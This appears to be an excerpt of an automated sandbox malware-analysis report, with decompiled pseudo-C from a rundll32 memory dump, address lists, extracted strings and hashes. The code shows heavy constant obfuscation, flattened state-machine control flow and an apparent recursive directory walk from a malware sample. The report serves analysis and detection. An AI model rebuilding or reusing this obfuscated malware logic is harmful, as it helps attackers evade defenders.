				_v312 = _v312 >> 0xb;
				_v312 = _v312 * 0x47;
				_v312 = _v312 | 0xe4800c53;
				_v312 = _v312 ^ 0xe4803130;
				_v244 = 0xec65;
				_v244 = _v244 + 0xffff9556;
				_v244 = _v244 | 0x698b2e6b;
				_v244 = _v244 ^ 0x698bc8a6;
				_v156 = 0x127c;
				_v156 = _v156 | 0x6c9b908e;
				_v156 = _v156 ^ 0x6c9bb95e;
				_v252 = 0xa39f;
				_v252 = _v252 ^ 0x10ea91c2;
				_v252 = _v252 + 0xffff0c69;
				_v252 = _v252 ^ 0x10e95188;
				_v296 = 0xcf1a;
				_t540 = 0x72;
				_v296 = _v296 / _t540;
				_t541 = 0x65;
				_v296 = _v296 / _t541;
				_v296 = _v296 ^ 0x49cec570;
				_v296 = _v296 ^ 0x49cefc9f;
				_v304 = 0xfa92;
				_v304 = _v304 ^ 0x91685bd9;
				_t542 = 0x5b;
				_v304 = _v304 / _t542;
				_v304 = _v304 >> 0xe;
				_v304 = _v304 ^ 0x0000734c;
				_v236 = 0x2319;
				_v236 = _v236 | 0x585205ff;
				_v236 = _v236 + 0x46c8;
				_v236 = _v236 ^ 0x585256ad;
				_v160 = 0xec38;
				_v160 = _v160 + 0xad8f;
				_v160 = _v160 ^ 0x0001bf45;
				_v200 = 0x7768;
				_v200 = _v200 | 0x7e4e67ed;
				_v200 = _v200 ^ 0x7e4e49cf;
				_v196 = 0x7f9c;
				_v196 = _v196 ^ 0x691be3cb;
				_v196 = _v196 ^ 0x691ba5a2;
				_v204 = 0x675;
				_v204 = _v204 | 0x9417c745;
				_v204 = _v204 ^ 0x9417a6f3;
				_v260 = 0x8fb0;
				_v260 = _v260 + 0xe239;
				_v260 = _v260 + 0xffff6c48;
				_v260 = _v260 ^ 0x0000cece;
				_v280 = 0x8e81;
				_v280 = _v280 + 0xffffbb5e;
				_v280 = _v280 + 0x1caa;
				_t543 = 0x18;
				_v280 = _v280 / _t543;
				_v280 = _v280 ^ 0x00002f18;
				_v288 = 0x5b56;
				_v288 = _v288 / _t476;
				_v288 = _v288 * 0x1b;
				_v288 = _v288 + 0xffff0a91;
				_v288 = _v288 ^ 0xffff6cbe;
				_v220 = 0x3904;
				_v220 = _v220 | 0x31b4c7be;
				_v220 = _v220 + 0xffffbc7e;
				_v220 = _v220 ^ 0x31b48f10;
				_v188 = 0x282d;
				_v188 = _v188 + 0xde16;
				_v188 = _v188 ^ 0x00013128;
				_v180 = 0x2ff0;
				_v180 = _v180 | 0xba1bde28;
				_v180 = _v180 ^ 0xba1ba646;
				_v264 = 0x9b10;
				_v264 = _v264 | 0x1221c802;
				_v264 = _v264 + 0xffff72da;
				_v264 = _v264 * 0x6a;
				_v264 = _v264 ^ 0x81ca5a0e;
				_v272 = 0x50a4;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 | 0xf9b433b3;
				_v272 = _v272 ^ 0xd076b632;
				_v272 = _v272 ^ 0x29c2e299;
				_t554 = _a4;
				_t544 = _v144;
				_t477 = _v144;
				while(_t545 != 0xb384dcd) {
					if(_t545 == 0x1d518447) {
						_push(0x2af0e0);
						_push(_v260);
						E00298E31(_t544, __eflags, _v144, _v288, E002933F4(_v196, _v204), _v220, _t477 - _t544, _v188);
						E0029F935(_v180, _t459, _v264, _v272);
						return 1;
					}
					if(_t545 == 0x275acb0b) {
						E0029689F(_v160,  *_t480,  *((intOrPtr*)(_t480 + 4)), _t544, _v200);
						_t480 = _v148;
						_t555 =  &(_t555[3]);
						_t545 = 0x1d518447;
						_t544 = _t544 +  *((intOrPtr*)(_t480 + 4));
						continue;
					}
					if(_t545 == 0x2bae1097) {
						_push(_t480);
						_push(_t480);
						_t544 = E002A9E2B(_a4);
						_t555 =  &(_t555[3]);
						 *_t554 = _t544;
						__eflags = _t544;
						if(_t544 == 0) {
							L15:
							__eflags = 0;
							return 0;
						}
						_t545 = 0xb384dcd;
						_t477 = _a4 + _t544;
						L8:
						_t480 = _v148;
						continue;
					}
					if(_t545 == 0x38be0af1) {
						_t545 = 0x2bae1097;
						_a4 =  *((intOrPtr*)(_t480 + 4)) + 0x1000;
						continue;
					}
					if(_t545 != 0x39d92d58) {
						L14:
						__eflags = _t545 - 0x2366d38d;
						if(_t545 != 0x2366d38d) {
							continue;
						}
						goto L15;
					}
					_v152 = E002A1214();
					_t545 = 0x38be0af1;
					goto L8;
				}
				_t444 = E0029E303(_v216,  &_v152, _v284);
				_pop(_t482);
				_push( &_v152);
				_t548 = (_t444 & 0x0000000f) + 4;
				E00298C04(_v300, _v172, _v224, _t548, _t482,  &_v64);
				 *((char*)(_t555 + _t548 + 0x128)) = 0;
				_t448 = E0029E303(_v184,  &_v152, _v292);
				_t556 =  &(_t555[7]);
				_t551 = (_t448 & 0x0000000f) + 4;
				_push( &_v152);
				E00298C04(_v164, _v316, _v248, _t551, _v184,  &_v128);
				_push(0x2af000);
				_push(_v240);
				 *((char*)(_t556 + _t551 + 0xec)) = 0;
				_t457 = E0029315B(E002933F4(_v176, _v256), _v212, _t477 - _t544,  &_v64,  &_v128, _v312, _v244, _v156, _v252, _v144);
				_t555 =  &(_t556[0x11]);
				_t544 = _t544 + _t457;
				__eflags = _t544;
				E0029F935(_v296, _t452, _v304, _v236);
				_t480 = _v148;
				_t545 = 0x275acb0b;
				goto L14;
			}

0x0029bb28
0x0029bb28
0x0029bb32
0x0029bb39
0x0029bb40
0x0029bb4d
0x0029bb54
0x0029bb5b
0x0029bb66
0x0029bb71
0x0029bb7c
0x0029bb89
0x0029bb8d
0x0029bb92
0x0029bb97
0x0029bb9f
0x0029bba7
0x0029bbaf
0x0029bbbf
0x0029bbc4
0x0029bbca
0x0029bbd2
0x0029bbdd
0x0029bbe5
0x0029bbf0
0x0029bbfb
0x0029bc06
0x0029bc11
0x0029bc19
0x0029bc25
0x0029bc2a
0x0029bc35
0x0029bc38
0x0029bc3c
0x0029bc44
0x0029bc4c
0x0029bc54
0x0029bc5c
0x0029bc6c
0x0029bc70
0x0029bc78
0x0029bc7d
0x0029bc85
0x0029bc92
0x0029bc93
0x0029bc9c
0x0029bca0
0x0029bca5
0x0029bcad
0x0029bcb5
0x0029bcba
0x0029bcc8
0x0029bccc
0x0029bcd4
0x0029bcdf
0x0029bcea
0x0029bcf5
0x0029bcfd
0x0029bd0b
0x0029bd0e
0x0029bd12
0x0029bd1a
0x0029bd25
0x0029bd2d
0x0029bd38
0x0029bd40
0x0029bd4d
0x0029bd51
0x0029bd59
0x0029bd61
0x0029bd6d
0x0029bd72
0x0029bd78
0x0029bd80
0x0029bd88
0x0029bd9a
0x0029bd9f
0x0029bda8
0x0029bdb3
0x0029bdbb
0x0029bdc3
0x0029bdcb
0x0029bdd0
0x0029bdd8
0x0029bde0
0x0029bde8
0x0029bded
0x0029bdf5
0x0029be07
0x0029be0a
0x0029be11
0x0029be1c
0x0029be24
0x0029be2c
0x0029be34
0x0029be3c
0x0029be44
0x0029be4c
0x0029be54
0x0029be5c
0x0029be64
0x0029be69
0x0029be71
0x0029be79
0x0029be83
0x0029be87
0x0029be8f
0x0029be97
0x0029be9f
0x0029bea7
0x0029beaf
0x0029beb7
0x0029bec2
0x0029becd
0x0029bed8
0x0029bee0
0x0029bee8
0x0029bef0
0x0029befa
0x0029bf08
0x0029bf0d
0x0029bf17
0x0029bf1c
0x0029bf20
0x0029bf28
0x0029bf30
0x0029bf38
0x0029bf46
0x0029bf4b
0x0029bf4f
0x0029bf54
0x0029bf5c
0x0029bf64
0x0029bf6c
0x0029bf74
0x0029bf7c
0x0029bf87
0x0029bf92
0x0029bf9d
0x0029bfa8
0x0029bfb3
0x0029bfbe
0x0029bfc9
0x0029bfd4
0x0029bfdf
0x0029bfea
0x0029bff5
0x0029c000
0x0029c008
0x0029c010
0x0029c018
0x0029c020
0x0029c028
0x0029c030
0x0029c03e
0x0029c043
0x0029c047
0x0029c04f
0x0029c05d
0x0029c066
0x0029c06a
0x0029c072
0x0029c07a
0x0029c082
0x0029c08a
0x0029c092
0x0029c09a
0x0029c0a5
0x0029c0b0
0x0029c0bb
0x0029c0c6
0x0029c0d1
0x0029c0dc
0x0029c0e4
0x0029c0ec
0x0029c0f9
0x0029c0fd
0x0029c105
0x0029c10d
0x0029c112
0x0029c11a
0x0029c122
0x0029c12a
0x0029c131
0x0029c138
0x0029c13f
0x0029c151
0x0029c35e
0x0029c363
0x0029c39f
0x0029c3b5
0x00000000
0x0029c3bf
0x0029c15d
0x0029c203
0x0029c208
0x0029c20f
0x0029c212
0x0029c217
0x00000000
0x0029c217
0x0029c169
0x0029c1c9
0x0029c1ca
0x0029c1d3
0x0029c1d5
0x0029c1d8
0x0029c1db
0x0029c1dd
0x0029c351
0x0029c351
0x00000000
0x0029c351
0x0029c1e6
0x0029c1eb
0x0029c19b
0x0029c19b
0x00000000
0x0029c19b
0x0029c171
0x0029c1a7
0x0029c1b1
0x00000000
0x0029c1b1
0x0029c179
0x0029c345
0x0029c345
0x0029c34b
0x00000000
0x00000000
0x00000000
0x0029c34b
0x0029c18f
0x0029c196
0x00000000
0x0029c196
0x0029c22e
0x0029c233
0x0029c23d
0x0029c24a
0x0029c261
0x0029c278
0x0029c280
0x0029c285
0x0029c294
0x0029c297
0x0029c2b5
0x0029c2ba
0x0029c2bf
0x0029c2ce
0x0029c31a
0x0029c31f
0x0029c324
0x0029c324
0x0029c332
0x0029c339
0x0029c340
0x00000000

Strings

_, xrefs: 0029BE1C
t', xrefs: 0029BBF0
0j, xrefs: 0029BB7C
+,, xrefs: 0029BCD4
8, xrefs: 0029BF7C
V[, xrefs: 0029C04F
e, xrefs: 0029BE97
gN~, xrefs: 0029BFA8
9, xrefs: 0029C008
z, xrefs: 0029BBE5
-(, xrefs: 0029C09A
Ls, xrefs: 0029BF54

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +,$-($0j$8$9$Ls$V[$e$t'$_$gN~$z
API String ID: 0-4288992561
Opcode ID: 22fb121240ac573611b7cdbc844692e68d1095bbd15bdc35cff3391837845414
Instruction ID: f924b4c78bdd9f5048807df92ce9bdd3fbed23d063d14570eed77e3d8344b378
Opcode Fuzzy Hash: 22fb121240ac573611b7cdbc844692e68d1095bbd15bdc35cff3391837845414
Instruction Fuzzy Hash: 5E2232715083819FE3A4CF25C58AA8FFBE1BBC5348F10892DE5D996260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029C8A5, Relevance: 14.1, Strings: 11, Instructions: 369
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E0029C8A5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				intOrPtr _v1588;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				void* _t364;
				signed int _t393;
				signed int _t396;
				void* _t397;
				signed int _t401;
				void* _t408;
				void* _t414;
				void* _t449;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				void* _t473;
				void* _t474;
				void* _t475;

				_push(_a20);
				_t473 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t364);
				_v1700 = 0xef65;
				_t475 = _t474 + 0x1c;
				_v1700 = _v1700 >> 4;
				_t408 = 0x2fbc69ba;
				_t460 = 7;
				_v1700 = _v1700 / _t460;
				_v1700 = _v1700 ^ 0x00000233;
				_v1736 = 0x77c0;
				_v1736 = _v1736 + 0x296d;
				_v1736 = _v1736 >> 0xb;
				_v1736 = _v1736 ^ 0x00006588;
				_v1696 = 0xa42e;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 + 0xd510;
				_v1696 = _v1696 ^ 0x01497cd0;
				_v1668 = 0x825e;
				_v1668 = _v1668 ^ 0x5a1cdfcc;
				_v1668 = _v1668 ^ 0x6191fffa;
				_v1668 = _v1668 ^ 0x3b8d9985;
				_v1680 = 0x873e;
				_v1680 = _v1680 >> 0xf;
				_t461 = 0x5d;
				_v1680 = _v1680 * 0x23;
				_v1680 = _v1680 ^ 0x00000451;
				_v1772 = 0x9b84;
				_v1772 = _v1772 << 0xb;
				_v1772 = _v1772 | 0x19caaf5c;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0xbd5e9b44;
				_v1776 = 0x14a2;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 + 0x1851;
				_v1776 = _v1776 ^ 0x000003d5;
				_v1760 = 0x9d48;
				_v1760 = _v1760 | 0xf4835317;
				_v1760 = _v1760 / _t461;
				_v1760 = _v1760 + 0xadfb;
				_v1760 = _v1760 ^ 0x02a1926d;
				_v1764 = 0xd024;
				_v1764 = _v1764 ^ 0x75bfba49;
				_t462 = 0x2c;
				_v1764 = _v1764 / _t462;
				_v1764 = _v1764 << 3;
				_v1764 = _v1764 ^ 0x1568fb68;
				_v1640 = 0xd095;
				_v1640 = _v1640 + 0x68a6;
				_v1640 = _v1640 ^ 0x00011e87;
				_v1644 = 0x4d25;
				_v1644 = _v1644 ^ 0xfa3c872a;
				_v1644 = _v1644 ^ 0xfa3cf0fd;
				_v1756 = 0x7142;
				_v1756 = _v1756 ^ 0x41f2ce3c;
				_v1756 = _v1756 + 0x589a;
				_v1756 = _v1756 + 0xef55;
				_v1756 = _v1756 ^ 0x41f454e3;
				_v1672 = 0xcd80;
				_v1672 = _v1672 >> 0xe;
				_v1672 = _v1672 >> 6;
				_v1672 = _v1672 ^ 0x000004be;
				_v1656 = 0xa5e2;
				_v1656 = _v1656 >> 0xf;
				_v1656 = _v1656 ^ 0x00005d10;
				_v1688 = 0x4307;
				_v1688 = _v1688 ^ 0xf8e571c9;
				_v1688 = _v1688 + 0xffff617c;
				_v1688 = _v1688 ^ 0xf8e4e5a7;
				_v1744 = 0x4358;
				_v1744 = _v1744 ^ 0x6a39e931;
				_v1744 = _v1744 << 0xa;
				_t463 = 0x71;
				_v1744 = _v1744 / _t463;
				_v1744 = _v1744 ^ 0x020af85a;
				_v1660 = 0xcade;
				_t464 = 0x4f;
				_v1660 = _v1660 / _t464;
				_v1660 = _v1660 ^ 0x0000062a;
				_v1692 = 0xab9b;
				_t465 = 0x21;
				_v1692 = _v1692 / _t465;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 ^ 0x000556b2;
				_v1648 = 0xb997;
				_v1648 = _v1648 | 0xf4544387;
				_v1648 = _v1648 ^ 0xf45494f1;
				_v1716 = 0x788f;
				_v1716 = _v1716 ^ 0x250ce2aa;
				_t466 = 0x64;
				_v1716 = _v1716 / _t466;
				_v1716 = _v1716 ^ 0x005ea635;
				_v1684 = 0xf0c4;
				_v1684 = _v1684 << 0xc;
				_v1684 = _v1684 | 0x733f2c5b;
				_v1684 = _v1684 ^ 0x7f3f289c;
				_v1724 = 0xfc6c;
				_v1724 = _v1724 ^ 0x3591892a;
				_v1724 = _v1724 + 0xcfb2;
				_v1724 = _v1724 ^ 0x35926297;
				_v1676 = 0x5703;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 ^ 0x00050027;
				_v1752 = 0x36a9;
				_v1752 = _v1752 << 0xe;
				_v1752 = _v1752 ^ 0x911815de;
				_v1752 = _v1752 + 0x3dd8;
				_v1752 = _v1752 ^ 0x9cb2ba8a;
				_v1768 = 0x4d15;
				_v1768 = _v1768 | 0xf01c2bfc;
				_v1768 = _v1768 << 0xd;
				_v1768 = _v1768 >> 0x10;
				_v1768 = _v1768 ^ 0x0000a243;
				_v1636 = 0x385c;
				_t467 = 0x1a;
				_v1636 = _v1636 / _t467;
				_v1636 = _v1636 ^ 0x00000be7;
				_v1652 = 0xf48c;
				_v1652 = _v1652 << 0x10;
				_v1652 = _v1652 ^ 0xf48c2628;
				_v1708 = 0x6e63;
				_v1708 = _v1708 << 8;
				_v1708 = _v1708 >> 6;
				_v1708 = _v1708 ^ 0x00019599;
				_v1732 = 0x3e21;
				_t468 = 0x44;
				_v1732 = _v1732 * 0x47;
				_v1732 = _v1732 * 0x5f;
				_v1732 = _v1732 ^ 0x0664acef;
				_v1664 = 0x2bc6;
				_v1664 = _v1664 + 0xffff4312;
				_v1664 = _v1664 ^ 0xffff783b;
				_v1704 = 0x50a2;
				_v1704 = _v1704 + 0x2dd2;
				_t459 = _v1664;
				_v1704 = _v1704 / _t468;
				_v1704 = _v1704 ^ 0x00002a3e;
				_v1748 = 0x901a;
				_v1748 = _v1748 << 4;
				_v1748 = _v1748 + 0x4210;
				_t469 = 0x39;
				_v1748 = _v1748 / _t469;
				_v1748 = _v1748 ^ 0x00007ac2;
				_v1712 = 0x29ba;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x00a6b995;
				_v1720 = 0x8b08;
				_v1720 = _v1720 + 0xffffb6f4;
				_t470 = 6;
				_v1720 = _v1720 / _t470;
				_v1720 = _v1720 ^ 0x00001229;
				_v1740 = 0xbc9a;
				_v1740 = _v1740 >> 0xa;
				_v1740 = _v1740 * 0x3c;
				_v1740 = _v1740 + 0x7392;
				_v1740 = _v1740 ^ 0x0000345c;
				_v1728 = 0x7114;
				_v1728 = _v1728 + 0xffff466c;
				_v1728 = _v1728 ^ 0x33c8a084;
				_v1728 = _v1728 ^ 0xcc377c5e;
				while(1) {
					_t449 = 0x2e;
					L2:
					while(_t408 != 0x25e1cef) {
						if(_t408 == 0x83edf3b) {
							return E002A85D2(_v1712, _t459, _v1720, _v1740, _v1728);
						}
						if(_t408 == 0x9602f07) {
							_t396 = E002A75F0( &_v520, _v1672, _v1656, _v1688,  &_v1632);
							_t459 = _t396;
							_t475 = _t475 + 0x10;
							__eflags = _t396 - 0xffffffff;
							if(__eflags == 0) {
								return _t396;
							}
							_t408 = 0x2135cd7a;
							while(1) {
								_t449 = 0x2e;
								goto L2;
							}
						}
						if(_t408 == 0x12f90048) {
							_push(_v1668);
							_push(_v1696);
							_t397 = E00296ABA(_v1736, 0x2af980, __eflags);
							_pop(_t414);
							E002962BE(_v1680, __eflags, _t414, _t397, _v1772, _v1776, _v1760,  &_v520);
							E0029F935(_v1764, _t397, _v1640, _v1644);
							_t475 = _t475 + 0x20;
							_t408 = 0x9602f07;
							while(1) {
								_t449 = 0x2e;
								goto L2;
							}
						}
						if(_t408 == 0x2135cd7a) {
							_t401 = _v1700;
							__eflags = _v1632 & _t401;
							if(__eflags == 0) {
								_t401 = _a12( &_v1632, _a16);
								asm("sbb ecx, ecx");
								_t408 = ( ~_t401 & 0xfa1f3db4) + 0x83edf3b;
								while(1) {
									_t449 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t449;
							if(_v1588 != _t449) {
								L15:
								__eflags = _a20;
								if(__eflags != 0) {
									_push(_v1692);
									_push(_v1660);
									E0029F882(__eflags, E00296ABA(_v1744, 0x2af9b0, __eflags), _v1648, _v1716, _v1684, _v1724, _t473,  &_v1040);
									E0029C8A5(_v1676,  &_v1040, _v1752, _v1768, _a12, _a16, _a20);
									_t475 = _t475 + 0x38;
									_t401 = E0029F935(_v1636, _t403, _v1652, _v1708);
									_t449 = 0x2e;
								}
								L14:
								_t408 = 0x25e1cef;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L14;
							}
							__eflags = _v1586 - _t449;
							if(_v1586 != _t449) {
								goto L15;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L15;
							}
							goto L14;
						}
						if(_t408 != 0x2fbc69ba) {
							L24:
							__eflags = _t408 - 0x16777166;
							if(__eflags != 0) {
								continue;
							}
							return _t401;
						}
						_t408 = 0x12f90048;
					}
					_t393 = E0029D4DC(_v1732, _v1664, _v1704, _v1748, _t459,  &_v1632);
					_t475 = _t475 + 0x10;
					__eflags = _t393;
					if(__eflags != 0) {
						_t408 = 0x2135cd7a;
						_t449 = 0x2e;
						goto L24;
					}
					_t408 = 0x83edf3b;
				}
			}

0x0029c8ae
0x0029c8b5
0x0029c8b7
0x0029c8be
0x0029c8c5
0x0029c8cc
0x0029c8d3
0x0029c8d4
0x0029c8d5
0x0029c8da
0x0029c8e2
0x0029c8e5
0x0029c8f0
0x0029c8f7
0x0029c8fc
0x0029c902
0x0029c90a
0x0029c912
0x0029c91a
0x0029c91f
0x0029c927
0x0029c92f
0x0029c934
0x0029c93c
0x0029c944
0x0029c94f
0x0029c95a
0x0029c965
0x0029c970
0x0029c978
0x0029c982
0x0029c985
0x0029c989
0x0029c991
0x0029c999
0x0029c99e
0x0029c9a6
0x0029c9ab
0x0029c9b3
0x0029c9bb
0x0029c9c0
0x0029c9c5
0x0029c9cd
0x0029c9d5
0x0029c9dd
0x0029c9ed
0x0029c9f1
0x0029c9f9
0x0029ca01
0x0029ca09
0x0029ca15
0x0029ca18
0x0029ca1c
0x0029ca21
0x0029ca29
0x0029ca34
0x0029ca3f
0x0029ca4a
0x0029ca55
0x0029ca60
0x0029ca6b
0x0029ca73
0x0029ca7b
0x0029ca83
0x0029ca8b
0x0029ca93
0x0029ca9d
0x0029caa2
0x0029caa7
0x0029caaf
0x0029caba
0x0029cac2
0x0029cacd
0x0029cad5
0x0029cadd
0x0029cae5
0x0029caed
0x0029caf5
0x0029cafd
0x0029cb08
0x0029cb0d
0x0029cb13
0x0029cb1b
0x0029cb2d
0x0029cb32
0x0029cb3b
0x0029cb46
0x0029cb52
0x0029cb57
0x0029cb5d
0x0029cb62
0x0029cb6a
0x0029cb75
0x0029cb80
0x0029cb8b
0x0029cb93
0x0029cb9f
0x0029cba4
0x0029cbaa
0x0029cbb2
0x0029cbba
0x0029cbbf
0x0029cbc7
0x0029cbcf
0x0029cbd7
0x0029cbdf
0x0029cbe7
0x0029cbef
0x0029cbf7
0x0029cbfc
0x0029cc01
0x0029cc09
0x0029cc11
0x0029cc16
0x0029cc1e
0x0029cc26
0x0029cc2e
0x0029cc36
0x0029cc3e
0x0029cc43
0x0029cc48
0x0029cc50
0x0029cc62
0x0029cc65
0x0029cc6c
0x0029cc77
0x0029cc82
0x0029cc8c
0x0029cc97
0x0029cc9f
0x0029cca4
0x0029cca9
0x0029ccb1
0x0029ccc0
0x0029ccc3
0x0029cccc
0x0029ccd0
0x0029ccd8
0x0029cce3
0x0029ccee
0x0029ccf9
0x0029cd01
0x0029cd11
0x0029cd18
0x0029cd1c
0x0029cd24
0x0029cd2c
0x0029cd31
0x0029cd3d
0x0029cd42
0x0029cd48
0x0029cd50
0x0029cd58
0x0029cd5d
0x0029cd62
0x0029cd6a
0x0029cd72
0x0029cd7e
0x0029cd81
0x0029cd85
0x0029cd8d
0x0029cd95
0x0029cd9f
0x0029cda3
0x0029cdab
0x0029cdb3
0x0029cdbb
0x0029cdc3
0x0029cdcb
0x0029cdd3
0x0029cdd5
0x00000000
0x0029cdd6
0x0029cde8
0x00000000
0x0029d03e
0x0029cdf4
0x0029cfc6
0x0029cfcb
0x0029cfcd
0x0029cfd0
0x0029cfd3
0x0029d04a
0x0029d04a
0x0029cfd5
0x0029cdd3
0x0029cdd5
0x00000000
0x0029cdd5
0x0029cdd3
0x0029ce00
0x0029cf3d
0x0029cf46
0x0029cf4e
0x0029cf54
0x0029cf76
0x0029cf8f
0x0029cf94
0x0029cf97
0x0029cdd3
0x0029cdd5
0x00000000
0x0029cdd5
0x0029cdd3
0x0029ce0c
0x0029ce21
0x0029ce25
0x0029ce2c
0x0029cf1f
0x0029cf2a
0x0029cf32
0x0029cdd3
0x0029cdd5
0x00000000
0x0029cdd5
0x0029cdd3
0x0029ce32
0x0029ce3a
0x0029ce66
0x0029ce66
0x0029ce6e
0x0029ce70
0x0029ce79
0x0029ceb2
0x0029cee5
0x0029ceea
0x0029cf01
0x0029cf0a
0x0029cf0a
0x0029ce5c
0x0029ce5c
0x00000000
0x0029ce5c
0x0029ce3c
0x0029ce45
0x00000000
0x00000000
0x0029ce47
0x0029ce4f
0x00000000
0x00000000
0x0029ce51
0x0029ce5a
0x00000000
0x00000000
0x00000000
0x0029ce5a
0x0029ce14
0x0029d019
0x0029d019
0x0029d01f
0x00000000
0x00000000
0x00000000
0x0029d01f
0x0029ce1a
0x0029ce1a
0x0029cffb
0x0029d000
0x0029d003
0x0029d005
0x0029d013
0x0029d018
0x00000000
0x0029d018
0x0029d007
0x0029d007

Strings

!>, xrefs: 0029CCB1
\4, xrefs: 0029CDAB
19j, xrefs: 0029CAF5
U, xrefs: 0029CA83
\8, xrefs: 0029CC50
cn, xrefs: 0029CC97
%M, xrefs: 0029CA4A
>*, xrefs: 0029CD1C
', xrefs: 0029CC01
[,?s, xrefs: 0029CBBF
e, xrefs: 0029C8DA

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !>$%M$'$19j$>*$U$[,?s$\4$\8$cn$e
API String ID: 0-760149550
Opcode ID: ad1790dd05c02b4c963fc108be14de39db7f4fa55126b3178f2054158ce51440
Instruction ID: 652b9e1d74f568687bf9abb1c5c860e745899ab7dee5fea9d687924d5bcf621d
Opcode Fuzzy Hash: ad1790dd05c02b4c963fc108be14de39db7f4fa55126b3178f2054158ce51440
Instruction Fuzzy Hash: C70254715183809FE768CF25C549A9BBBE1FBC4708F10891DF2DA862A0D7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00292746, Relevance: 14.1, Strings: 11, Instructions: 355
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00292746(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t406;
				intOrPtr _t412;
				short* _t415;
				signed int _t416;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				short _t470;
				void* _t471;
				intOrPtr* _t473;
				signed int* _t474;

				_t474 =  &_v1216;
				_v1052 = 0x61e0b9;
				_t473 = __edx;
				_v1056 = __ecx;
				_t470 = 0;
				_v1048 = _v1048 & 0;
				_t471 = 0x2e8890c5;
				_v1044 = _v1044 & 0;
				_v1116 = 0x96ff;
				_t419 = 0x57;
				_v1116 = _v1116 / _t419;
				_t420 = 0x2e;
				_v1116 = _v1116 * 0x73;
				_v1116 = _v1116 ^ 0x0000c776;
				_v1172 = 0xd391;
				_v1172 = _v1172 ^ 0x157b14c0;
				_v1172 = _v1172 * 0x50;
				_v1172 = _v1172 ^ 0xb6ae4940;
				_v1124 = 0x910;
				_v1124 = _v1124 | 0x21848f96;
				_v1124 = _v1124 / _t420;
				_v1124 = _v1124 ^ 0x40ba88af;
				_v1184 = 0xee32;
				_t421 = 0x2c;
				_v1184 = _v1184 / _t421;
				_t416 = 0x76;
				_v1184 = _v1184 / _t416;
				_v1184 = _v1184 ^ 0x36b4769c;
				_v1184 = _v1184 ^ 0x36b471cf;
				_v1108 = 0x7793;
				_v1108 = _v1108 >> 2;
				_v1108 = _v1108 ^ 0x00007b9c;
				_v1152 = 0x27a4;
				_v1152 = _v1152 ^ 0x4cf8fd1c;
				_v1152 = _v1152 << 5;
				_v1152 = _v1152 ^ 0x9f1b270a;
				_v1096 = 0x7257;
				_t422 = 0x4b;
				_v1096 = _v1096 / _t422;
				_v1096 = _v1096 ^ 0x00001a70;
				_v1072 = 0xc442;
